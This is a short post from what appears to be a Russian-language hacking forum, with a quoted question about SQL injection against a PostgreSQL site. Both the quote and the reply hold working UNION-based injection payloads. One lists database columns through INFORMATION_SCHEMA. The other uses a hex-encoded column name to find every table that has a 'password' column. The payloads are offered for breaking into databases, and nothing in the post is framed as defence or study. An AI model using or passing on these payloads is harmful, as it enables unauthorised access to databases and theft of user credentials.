29.01.2009, 02:39
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Сообщение от Велемир
http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--
Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36
ЗЫ: postgre_sql()
Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
Код:
UNION+SELECT+group_concat(table_name)+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
так же в хексе можна вставить любое название колонки
|
|
|